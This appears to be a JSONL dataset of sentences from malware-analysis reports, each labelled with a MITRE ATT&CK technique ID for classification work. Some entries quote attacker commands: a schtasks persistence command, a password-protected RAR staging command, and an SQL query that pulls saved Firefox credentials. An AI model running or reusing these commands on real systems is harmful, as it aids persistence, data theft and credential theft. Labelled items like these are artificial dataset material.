{"text1":"The malware performs the following activities:  Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system  The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()","labels":"['T1041']"}
{"text1":"In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim\u2019s machine and the C2 server","labels":"['T1041']"}
{"text1":"After obtaining the unique ID from the C2 server, the Trojan calls the \u201cSetAbStatById\u201d method to notify the C2 server of its status of \u201c1\u201d to notify the server it had successfully received the filename and file data","labels":"['T1041']"}
{"text1":"The r1.log file stores information for exfiltration","labels":"['T1074']"}
{"text1":"After Comnie has been copied to the %TEMP% directory, it will look for the presence of the \u2018DQuit.tmp\u2019 file in this path","labels":"['T1074']"}
{"text1":"Log.php validates the sender by User-Agent, saves the data in the \u201cUP\u201d server directory and stores the metadata in the mssql database for later reference","labels":"['T1074']"}
{"text1":"Note: aswrundll.exe is very similar to Microsoft\u2019s own rundll32.exe - it allows you to execute DLLs by calling their exported functions","labels":"['T1218.011']"}
{"text1":"The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed","labels":"['T1218.011']"}
{"text1":"The loader component is executed via RUNDLL32.EXE","labels":"['T1218.011']"}
{"text1":"Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1","labels":"['T1218.011']"}
{"text1":"If the string is present, the malware executes the command RunDll32.exe","labels":"['T1218.011']"}
{"text1":"It loads the module with parameter vShow set to zero, which opens the application with a hidden window.\u00a0 Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exe","labels":"['T1218.010']"}
{"text1":"regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry.\u00a0  \u00a0The script attempts to load the malicious module using regsvr with the run function.\u00a0  Procmon shows the malicious module loaded to the Avast process","labels":"['T1218.010']"}
{"text1":"The malicious modules in regsvr32.exe memory After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded","labels":"['T1218.010']"}
{"text1":"If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes:   It will target unins000.exe if it is available","labels":"['T1218.010']"}
{"text1":"The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and module arqueiro.\u00a0  The downloaded modules found in regsvr32.exe as detected by the Cybereason platform","labels":"['T1218.010']"}
{"text1":"After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use","labels":"['T1218.010']"}
{"text1":"8 Making a copy of certutil and regsvr32 Certutil.exe (a copy is renamed to certis.exe by the trojan) is normally used in a windows environment to manage certificates, but in this case, it is used by the second stylesheet to download the malware payloads","labels":"['T1218.010']"}
{"text1":"11 AV detection If there is no Avast install present, the script proceeds to the final .dll execution using regsvr32 and quits","labels":"['T1218.010']"}
{"text1":"After unpacking the module, it is packed with an additional inner packer Pe123\\RPolyCryptor","labels":"['T1027.002']"}
{"text1":"BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin","labels":"['T1027.002']"}
{"text1":"Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits","labels":"['T1027.002']"}
{"text1":"The PCODE of the virtual machine is packed with the aplib packer","labels":"['T1027.002']"}
{"text1":"While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed","labels":"['T1027.002']"}
{"text1":"The MSIL file contains the packed core payload in its .Net resource section","labels":"['T1027.002']"}
{"text1":"Two modifications are made to UPX version 3.91:  The magic bytes UPX! in the UPX header are replaced with ASS7, The decompressed code and strings sections are XORed with 0x01","labels":"['T1027.002']"}
{"text1":"Figure 6: Difference between a stock UPX packed file and the modified one A patch for UPX is available on ESET\u2019s malware-research Github repository that allows unpacking Keydnap\u2019s backdoor with the usual upx -d","labels":"['T1027.002']"}
{"text1":"See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! \u2026or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick the industry Malware description The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware","labels":"['T1027.002']"}
{"text1":"(Source: Dell SecureWorks) In SWCs analyzed by CTU researchers, the threat actors added the Dean Edwards packed JavaScript code shown in Figure 9 to the end of a legitimate website's menu page","labels":"['T1027.002']"}
{"text1":"First, the sample is UPX packed","labels":"['T1027.002']"}
{"text1":"Data Exfiltration The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate","labels":"['T1115']"}
{"text1":"Cadelspy\u2019s main payload contains its back door functionality, allowing the threat to carry out the following activities:  Log keystrokes and the titles of open windows Gather clipboard data and system information Steal printer information and any documents that were sent to be printed Record audio Capture screenshots and webcam photos  Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers","labels":"['T1115']"}
{"text1":"Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16)","labels":"['T1046']"}
{"text1":"Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network.","labels":"['T1046']"}
{"text1":"What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not","labels":"['T1036']"}
{"text1":"Filename SHA256 Description   7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta    nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35    rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0    Table 5","labels":"['T1036']"}
{"text1":"Filename SHA256 Description   7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta   hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy   nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35   rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0   tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application","labels":"['T1036']"}
{"text1":"In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive:  YYYY-MM-DD hh:mm:ss     quser YYYY-MM-DD hh:mm:ss     C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"{destination_file.rar}\" \"{multiple user directories linked to the victim's projects}\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst  The threat actors typically rename the encrypted RAR archives","labels":"['T1036']"}
{"text1":"SHA256  a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff   MD5 1ff40e79d673461cd33bd8b68f8bb5b8   Compiled 2017.08.06 11:32:36 (GMT), 2.22   Type I386 Windows Console EXE   Size 101 888    Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:    Parameter Description   -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration","labels":"['T1036']"}
{"text1":"The file is named netwf.dat","labels":"['T1036']"}
{"text1":"The account names visually look similar to legitimate government organization names or other trusted third-party entities","labels":"['T1036']"}
{"text1":"The initial overlap was based on the filename wmssl.exe, which was seen as an executable name that Cannon would move the wmssl.txt attachment to install and execute a secondary payload","labels":"['T1036']"}
{"text1":"Writing executables to a randomly-selected directory under Program Files, and naming the EXE to match the chosen directory name, or, if that fails, writing the executable to a system-generated temporary file name, using the EXE extension   3","labels":"['T1036']"}
{"text1":"The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program","labels":"['T1036']"}
{"text1":"The \u201cVPN Client\u201d is a legitimate Juniper VPN software bundled with Helminth, \u00a0a malware in use by the OilRig threat agnet: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed","labels":"['T1036']"}
{"text1":"For example, we analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to \u201c%TEMP%\\flash_update.exe\u201d that was a legitimate Flash Player installer","labels":"['T1036']"}
{"text1":"Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities:  Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)","labels":"['T1036']"}
{"text1":"Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat","labels":"['T1036']"}
{"text1":"The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe","labels":"['T1036']"}
{"text1":"After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name","labels":"['T1036']"}
{"text1":"The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 5a0c4e1925c76a959ab0588f683ab437 Size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 46592 bytes Compile Time\u00a0\u00a0\u00a0 2014-11-19 08:55:10Z Import Hash\u00a0 \u00a0\u00a0\u00a06b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path \u201cC:\\Users\\Public\u201d, which fails on Windows XP because that path is not present by default","labels":"['T1036']"}
{"text1":"One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable","labels":"['T1036']"}
{"text1":"Filename qrat.exe   File Size 1093120 bytes   MD5 c05e5131b196f43e1d02ca5ccc48ec0e   SHA1 f28c592833f234c619917b5c7d8974840a810247   Notes Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll","labels":"['T1036']"}
{"text1":"Filename  Part-I.doc    File Size  11349102 bytes    MD5  92942c54224cd462dd201ae11a560bb8    SHA1  85a21624df2211af3daf05c86a3fbea8271059d3    Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036']"}
{"text1":"Filename  Part-II.doc    File Size  10156713 bytes    MD5  e32668e569362c96cc56db368b7e821e    SHA1  dadc493abbe3e21610539e1d5a42f523626a6132    Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe","labels":"['T1036']"}
{"text1":"When the shellcode embedded within the malicious EPS is executed, the following three files are dropped:  %PROGRAMDATA%\\Microsoft\\DeviceSync\\VMwareCplLauncher.exe %PROGRAMDATA%\\Microsoft\\DeviceSync\\vmtools.dll %PROGRAMDATA%\\Microsoft\\DeviceSync\\MSBuild.exe  In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload","labels":"['T1036']"}
{"text1":"The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool","labels":"['T1036']"}
{"text1":"These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders","labels":"['T1036']"}
{"text1":"In one instance we observed, one of the initial malware delivered to the victim, RATANKBA (TROJ_RATANKBA.A), connects to a legitimate but compromised website (eye-watch[.]in:443, a mobile application-selling site) from which a hack tool (nbt_scan.exe) is also downloaded","labels":"['T1036']"}
{"text1":"One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file","labels":"['T1036']"}
{"text1":"The legitimate owaauth.dll file resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\ while CTU researchers have observed the backdoor using the same filename in the %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\ directory","labels":"['T1036']"}
{"text1":"It was pretending to be an Adobe flash player update installer on a compromised website to lure users to click for the execution","labels":"['T1036']"}
{"text1":"Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors.","labels":"['T1036']"}
{"text1":"likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor","labels":"['T1036']"}
{"text1":"Using a custom User Agent string or the system's User Agent string derived from urlmon.dll   7","labels":"['T1543.001']"}
{"text1":"Persistence Once started, the Keydnap backdoor installs a plist file in \/Library\/LaunchAgents\/ if it has root privileges or $USER\/Library\/LaunchAgents\/ otherwise to achieve persistence across reboots","labels":"['T1543.001']"}
{"text1":"Figure 6 shows the Glimpse server responding to an inbound beacon from the Glimpse agent and sending a command whoami","labels":"['T1033']"}
{"text1":"The screenshot also shows the Glimpse server receiving the results of the whoami command executed by the agent","labels":"['T1033']"}
{"text1":"The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network","labels":"['T1033']"}
{"text1":"This document was also the first of the mid-November cluster which used the user\/USER author name instead of Joohn, further supporting the scenario of the document being copied between systems","labels":"['T1033']"}
{"text1":"The same code snippets are combined into a second stage JavaScript in \u201cC:\\Users\\<User Name>\\\u201d","labels":"['T1033']"}
{"text1":"The username appears to be attacker specified and has occurred in 2017 Bankshot samples","labels":"['T1033']"}
{"text1":"This links the previous samples with this unique username","labels":"['T1033']"}
{"text1":"Note that the username could be a small joke on the attackers\u2019 part regarding the attribution to FIN7","labels":"['T1033']"}
{"text1":"The magic value 0xFEEDFACF that belongs to Mach-O Executable (64 bit) Methods GET_LAUNCHNAME and GET_LABELNAME will return the hardcoded name of the property list \u201c.plist\u201d for the root user (com.apple.screen.assistantd.plist) and for the regular user (com.apple.spell.agent.plist)","labels":"['T1033']"}
{"text1":"The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\<username>\\AppData\\Roaming\\Out.jpg","labels":"['T1033']"}
{"text1":"code(2343)\", MsgBoxStyle.Critical, null);     The dropper then writes the content of the payload which resides as plaintext in a resource within the .NET assembly to C:\\Users\\<username>\\AppData\\Local\\Temp\\SystemDiskClean.ps1","labels":"['T1033']"}
{"text1":"File is dropped to C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0\\microsoft_network.exe","labels":"['T1033']"}
{"text1":"File starts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe","labels":"['T1033']"}
{"text1":"For example, in the previous variant of BADNEWS, the victim\u2019s unique identifier was stored under a variable named \u2018uid\u2019, the username was stored in a variable named \u2018u\u2019, etc","labels":"['T1033']"}
{"text1":"Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign","labels":"['T1033']"}
{"text1":"(Source: Dell SecureWorks) Further research revealed additional tools containing the same username (see Figure 21)","labels":"['T1033']"}
{"text1":"The SP variable is a string containing the victim's username","labels":"['T1033']"}
{"text1":"It also attempts to issue the following SQL query on the \u201csignons.sqlite\u201d file: \u201cSELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins WHERE timePasswordChanged\/1000 BETWEEN ? AND ?\u201d   117 ftpUpload Uses FTPManager:uploadFile method and a supplied server name, username and password","labels":"['T1033']"}
{"text1":"The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com.","labels":"['T1033']"}
{"text1":"Command ID 17 indexes to a function that collects the system information and sends it to the C2 server.","labels":"['T1033']"}
{"text1":"According to the server\u2019s code, the default command that it would issue to newly infected systems was a batch script contained in a file named 0000000000.bat","labels":"['T1059', 'T1064']"}
{"text1":"After execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:  MD5  Filename  d76261ba3b624933a6ebb5dd73758db4  WmiApCom  79b68cdd0044edd4fbf8067b22878644  WmiApCom.bat   The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents","labels":"['T1059', 'T1064']"}
{"text1":"Attackers using Comnie are leveraging malicious macros that initially hide decoy documents and shows them when the victim enables macros","labels":"['T1059', 'T1064']"}
{"text1":"Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL)","labels":"['T1059', 'T1064']"}
{"text1":"While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info","labels":"['T1059', 'T1064']"}
{"text1":"VBScript #1 The dropped script \u201c58d2a83f7778d5.36783181.vbs\u201d acts as a launcher","labels":"['T1059', 'T1064']"}
{"text1":"For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment","labels":"['T1059', 'T1064']"}
{"text1":"The following are the three files:   Defender.sct \u2013 The malicious JavaScript based scriptlet file","labels":"['T1059', 'T1064']"}
{"text1":"Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources","labels":"['T1059', 'T1064']"}
{"text1":"While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we believe that this group uses the script to deliver Metasploit\u2019s Meterpreter as a potential payload as well","labels":"['T1059', 'T1064']"}
{"text1":"Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file","labels":"['T1059', 'T1064']"}
{"text1":"Character  Description  0  File contains batch commands, it executes the batch commands  1  Rename the temporary file as .ps1 extension  2  Rename the temporary file as .vbs extension   Table 2: BONDUPDATER Actions Figure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation","labels":"['T1059', 'T1064']"}
{"text1":"To run persistently on the system, the Trojan will first create a VBScript file:SpecialFolder.CommonApplicationData\\srvResesponded.vbs that contains:CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The Trojan replaces the %app% string in the above VBScript with the path to its executable","labels":"['T1059', 'T1064']"}
{"text1":"The group often uses the trial version of Cobalt Strike, a publicly available commercial software for \u201cAdversary Simulations and Red Team Operations.\u201d Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, \u201ca PowerShell and Python post-exploitation agent.\u201d For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap","labels":"['T1059', 'T1064']"}
{"text1":"The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode","labels":"['T1059', 'T1064']"}
{"text1":"Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1","labels":"['T1059', 'T1064']"}
{"text1":"For that we can use a Python script, included in Appendix B \u2013 Python Scripts","labels":"['T1059', 'T1064']"}
{"text1":"Essentially, we are discussing ongoing activity revolving around several malware families:  KopiLuwak and IcedCoffeer Carbon Mosquito WhiteBear  Technical Rattle Turla\u2019s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper\/installation operations as well as for implementing complete backdoors","labels":"['T1059', 'T1064']"}
{"text1":"The image is downloaded directly, and the shellcode is loaded and executed in memory","labels":"['T1059', 'T1064']"}
{"text1":"(On the left is NavRAT, and on the right is the shellcode of ROKRAT):    We performed the same analysis for the shellcode located in the downloaded image file and the shellcode is not exactly the same, but the design is very similar","labels":"['T1059', 'T1064']"}
{"text1":"Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the \u201cforfiles\u201d utility","labels":"['T1059', 'T1064']"}
{"text1":"The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS).","labels":"['T1059', 'T1064']"}
{"text1":"The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.","labels":"['T1059', 'T1064']"}
{"text1":"The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach.","labels":"['T1059', 'T1064']"}
{"text1":"The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell.","labels":"['T1059', 'T1064']"}
{"text1":"Screenshot provided in leak showing administrative panel for hosting provider Berbid Server The screenshot showed the administrative panel for a VPS account on DeltaHost with four different virtual servers, as seen in Figure 20","labels":"['T1113']"}
{"text1":"Screenshot in leak of administrative panel for an account at DeltaHost If we use the filename of this screenshot and assume that it was taken on March 29, 2019 and subtract 194 days from this date, it is possible that this server had been operational since at least September 16, 2018","labels":"['T1113']"}
{"text1":"This screenshot is via an RDP session as indicated by the tab located at the top of the screen and is located at 164.132.67[.]216 which is hosted by OVH","labels":"['T1113']"}
{"text1":"The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible","labels":"['T1113']"}
{"text1":"Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands","labels":"['T1113']"}
{"text1":"SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path \u201c\/FeedBack.php\u201d","labels":"['T1113']"}
{"text1":"While sending to the C2 server, the data is formatted as follows: @{SYSINFO\u00a0 = $get.ToString(); ACTION = \"REGISTER\";}  Ability to take screenshots","labels":"['T1113']"}
{"text1":"The \u201cscreenshot\u201d command takes a screenshot that is saved as a.PNG file in \u201cProgramData\u201c","labels":"['T1113']"}
{"text1":"The screen capture below shows the decryption function.It then calls the StartAndPatchRegAsm function.This function tries to find the original Microsoft RegAsm executable path","labels":"['T1113']"}
{"text1":"Figure 3: Screen capture of\u00a0the downloader executed on OS X El Capitan","labels":"['T1113']"}
{"text1":"Interestingly, we\u2019ve seen recent samples embedding decoy documents that are screenshots of botnet C&C panels or dumps of credit card numbers","labels":"['T1113']"}
{"text1":"POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued","labels":"['T1113']"}
{"text1":"The command handle looks for the following command strings in Table 3:    Command Description   $fileDownload Uploads the contents of a specified file to C2   $importModule Adds a specified PowerShell module to the current script   $screenshot Executes the contents of the command, which should be the string \u2018$screenshot\u2019","labels":"['T1113']"}
{"text1":"23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2","labels":"['T1113']"}
{"text1":"SpyNote RAT captured the device\u2019s screen activities along with audio using the \u00a0MediaProjectionCallback\u00a0functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named \"video.mp4\" as shown in the following\u00a0screenshot:          Figure 5\u00a0:\u00a0Output\u00a0File     SMS stealing\u00a0 SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot\u00a0below:          Figure 6:\u00a0Reading SMS\u00a0messages     Stealing\u00a0contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the\u00a0spyware","labels":"['T1113']"}
{"text1":"[Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC  In addition to a standard malware analysis blog post, I\u2019d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future","labels":"['T1113']"}
{"text1":"Returns the screenshot to the C2 via: <img src=\u2019data:image\/jpeg;base64,[base64 of screenshot]\u2019 width=800 height=500 \/><br>   111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)","labels":"['T1113']"}
{"text1":"This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine","labels":"['T1070']"}
{"text1":"This is a guest post by independent security researcher James Quinn.\u00a0This will be Part 1 of a series titled Reversing Gh0stRAT Variants.\u00a0 As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors.\u00a0 Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1\u2019s.\u00a0 Of these samples, there was one specific sample that stood out to me.\u00a0 A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from \u201cGh0st\u201d to \u201cnbLGX\u201d, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data.\u00a0 Some key functionality is below:   Can download more malware   Offline Keylogger   Cleans Event logs","labels":"['T1070']"}
{"text1":"The same situation applies to authentication by key pair \u2013 the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used","labels":"['T1056']"}
{"text1":"The keylogger then records keystrokes in encrypted files, for example: thumbcache_96.dbx","labels":"['T1056']"}
{"text1":"NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers","labels":"['T1056']"}
{"text1":"It is commonly sold on various hacking forums as a keylogger and stealer that can be used to monitor systems and exfiltrate information from those systems","labels":"['T1056']"}
{"text1":"Deobfuscated, we can see it is the HawkEye Keylogger \u2014 Reborn v9, Version=9.0.1.6","labels":"['T1056']"}
{"text1":"8 Upload the TPX498.dat file, which contains the list of collected keystrokes","labels":"['T1056']"}
{"text1":"63 64 ku64.dll ku32.dll Keylogger & clipboard monitor","labels":"['T1056']"}
{"text1":"keylogger) may be missing for these platforms","labels":"['T1056']"}
{"text1":"However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively","labels":"['T1056']"}
{"text1":"There does appear to be function names however, including PeekMessageA, which has been previously observed in other keylogging malware","labels":"['T1056']"}
{"text1":"Keylogging Functionality XAgent also has a keylogger functionality that allows the threat actors to steal credentials as the user types them","labels":"['T1056']"}
{"text1":"This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes","labels":"['T1056']"}
{"text1":"Figure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks \u00a0 Superficially, we can immediately see the images are quite similar, but with some glaring differences","labels":"['T1574.002']"}
{"text1":"The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past","labels":"['T1574.002']"}
{"text1":"DLL side loading is often used to maintain persistence on the compromised system","labels":"['T1574.002']"}
{"text1":"Note: DLL side loading is a prevalent persistence technique that is used to launch a multitude of backdoors","labels":"['T1574.002']"}
{"text1":"Send exfiltrated data   taskkill.exe Ends working cycle of modules    Persistence Persistence modules are based on scheduled tasks and system registry","labels":"['T1053', 'T1053.005']"}
{"text1":"For newer operating systems, events.exe creates task.xml as follows:  Then it creates a Windows scheduled task using the following command:       schtasks.exe \/create \/TN \\\"Events\\\\CacheTask_<user_name_here>\" \/XML \\\"<event_cache_dir_path>t \/F\"     At the system registry level, modules achieve persistence by adding themselves into the key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit when it finds possible add values to the Winlogon subkey, and in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager","labels":"['T1053', 'T1053.005']"}
{"text1":"In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task","labels":"['T1053', 'T1053.005']"}
{"text1":"After execution of every task, the malware sleeps for one minute before executing the next task","labels":"['T1053', 'T1053.005']"}
{"text1":"The main similarities include the use of a scheduled task to persistently execute on the system, as well as the same general process to communicate with its C2 server","labels":"['T1053', 'T1053.005']"}
{"text1":"The decoded string from the Sch resource is: SchTasks \/Create \/SC MINUTE \/MO 3 \/TN \u201c%n%\u201d \/TR \u201cwscript %path%\u201d \/f The decoded string from the VBS resource is: CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin","labels":"['T1053', 'T1053.005']"}
